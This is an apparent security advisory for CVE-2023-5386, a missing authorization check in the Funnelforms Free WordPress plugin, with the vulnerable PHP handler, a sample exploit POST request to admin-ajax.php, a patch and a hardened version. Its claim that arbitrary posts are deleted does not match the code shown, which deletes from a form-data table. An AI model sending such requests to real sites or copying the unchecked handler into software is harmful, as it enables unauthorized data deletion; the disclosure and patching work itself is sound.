Description: The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_delete_posts function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete arbitrary posts, including administrator posts, and posts not related to the Funnelforms Free plugin.

Background

Funnelforms Free is a popular plugin for WordPress that helps users create customizable registration forms, contact forms, and various other types of forms on their websites.

Vulnerability Details

The vulnerability is described in the Common Vulnerabilities and Exposures (CVE) database as CVE-2023-5386. It affects Funnelforms Free plugin versions up to and including 3.4.

The issue lies in a missing capability check in the fnsf_delete_posts function of the plugin. This function is supposed to allow administrators to delete Funnelforms-related posts. However, due to the missing capability check, any authenticated user with subscriber-level permissions and above can also delete arbitrary posts, including administrator posts and posts not related to the Funnelforms Free plugin.

Code Snippet - Vulnerable Function

function fnsf_delete_posts() {
    global $wpdb;
    $nonce = $_POST['nonce']; // Read but never verified (no check_ajax_referer()/wp_verify_nonce())
    $id = $_POST['id'];       // Untrusted request value used directly as the row id

    // Missing capability check here! Any logged-in user who can reach this
    // admin-ajax action (a subscriber included) falls straight through to the delete.

    $wpdb->delete( $wpdb->prefix . 'funnelforms_form_data', array( 'id' => $id ), array( '%d' ) );

    $response = array( 'success' => true ); // Defined here so the JSON reply is well-formed
    echo json_encode( $response );
    die();
}

The vulnerability can be exploited by any authenticated user with at least subscriber-level access to a WordPress site using the Funnelforms Free plugin. Attackers can take advantage of this vulnerability to delete important posts, potentially causing significant damage to the targeted site.

Exploit Example

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_[redacted]=testuser%7C[redacted]

action=fnsf_delete_posts&nonce=[redacted]&id=42

This request would delete the post with ID 42, regardless of the user's permissions and regardless of whether the post is related to the Funnelforms Free plugin.

Affected Versions

Funnelforms Free plugin versions up to and including version 3.4.

Solution

The vulnerability is fixed in Funnelforms Free version 3.5. All users are urged to update the plugin to this version immediately to address this critical security issue. The plugin can be updated from the WordPress plugin repository.

Patch Example

The vulnerability can also be fixed by modifying the problematic function to include a capability check, as shown below:

function fnsf_delete_posts() {
    global $wpdb;
    $nonce = $_POST['nonce']; // Still read but not verified; the fix below addresses authorization only
    $id = $_POST['id'];

    // Added capability check - begin
    // Subscribers do not hold 'manage_options', so they are rejected before the delete runs.
    if ( ! current_user_can( 'manage_options' ) ) { // Using 'manage_options' as an example
        echo json_encode( array( "error" => "Unauthorized access attempt" ) );
        die();
    }
    // Added capability check - end

    $wpdb->delete( $wpdb->prefix . 'funnelforms_form_data', array( 'id' => $id ), array( '%d' ) );

    $response = array( 'success' => true ); // Defined here so the JSON reply is well-formed
    echo json_encode( $response );
    die();
}
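For comparison with the patch above, here is an added example of how such an admin-ajax delete handler is typically hardened end to end: the capability check that CVE-2023-5386 lacked, plus nonce verification and input validation. This is not the plugin's own code; the nonce action name 'fnsf_delete_posts_nonce', the handler name and the error messages are assumptions.

```php
<?php
// Added example, not Funnelforms Free code. Assumed: nonce action name
// 'fnsf_delete_posts_nonce', handler name fnsf_delete_posts_hardened.

// Register for logged-in users only. Deliberately no wp_ajax_nopriv_ hook,
// so unauthenticated requests to admin-ajax.php never reach this function.
add_action( 'wp_ajax_fnsf_delete_posts', 'fnsf_delete_posts_hardened' );

function fnsf_delete_posts_hardened() {
    // 1. CSRF protection: the nonce must match the action it was issued for.
    //    check_ajax_referer() terminates the request with -1 on failure.
    check_ajax_referer( 'fnsf_delete_posts_nonce', 'nonce' );

    // 2. Authorization: the check the vulnerable version was missing.
    //    Subscribers do not hold 'manage_options' and are rejected here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 3. Input validation: coerce the id to a positive integer before any DB access.
    $id = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( array( 'message' => 'Invalid id' ), 400 );
    }

    global $wpdb;
    $deleted = $wpdb->delete(
        $wpdb->prefix . 'funnelforms_form_data',
        array( 'id' => $id ),
        array( '%d' )
    );

    // $wpdb->delete() returns false on error, otherwise the number of rows removed.
    if ( false === $deleted ) {
        wp_send_json_error( array( 'message' => 'Database error' ), 500 );
    }

    wp_send_json_success( array( 'deleted' => (int) $deleted ) );
}

// The admin page that issues the request obtains the matching nonce with
// wp_create_nonce( 'fnsf_delete_posts_nonce' ) (for example via wp_localize_script)
// and sends it in the 'nonce' POST field alongside 'action' and 'id'.
```

Each of the three checks fails closed with a JSON error and a matching HTTP status, so a rejected request leaves a distinguishable entry in the web server log.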

Original References

- CVE-2023-5386
- Funnelforms Free WordPress plugin
- Funnelforms Free 3.5 Changelog

Conclusion

This post describes the unauthorized data modification vulnerability affecting the Funnelforms Free plugin for WordPress. This vulnerability, CVE-2023-5386, can lead to the deletion of arbitrary posts by authenticated attackers with subscriber-level permissions and above. The vulnerability has been fixed in Funnelforms Free version 3.5. Users should update the plugin to the latest version immediately to mitigate any potential security risks.

Timeline

Published on: 11/22/2023 16:15:11 UTC
Last modified on: 11/27/2023 20:14:47 UTC